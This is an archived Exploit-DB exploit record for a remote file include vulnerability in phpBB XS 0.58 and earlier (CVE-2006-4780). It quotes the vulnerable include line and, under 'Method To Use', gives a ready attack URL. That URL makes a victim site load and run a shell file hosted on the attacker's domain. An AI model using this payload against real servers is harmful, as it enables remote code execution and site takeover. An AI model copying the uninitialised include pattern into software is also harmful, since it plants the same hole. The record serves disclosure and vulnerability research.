phpBB XS <= 0.58 functions.php Remote File Include Vulnerability

2006-09-12T00:00:00
ID EDB-ID:2349
Type exploitdb
Reporter AzzCoder
Modified 2006-09-12T00:00:00

Description

phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability. CVE-2006-4780. Webapps exploit for php platform

                                        
                                            Author: AzzCoder

Vendor: http://www.phpbbxs.eu/

Vulnerable File: includes/functions.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

Method To Use:

http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?

# milw0rm.com [2006-09-12]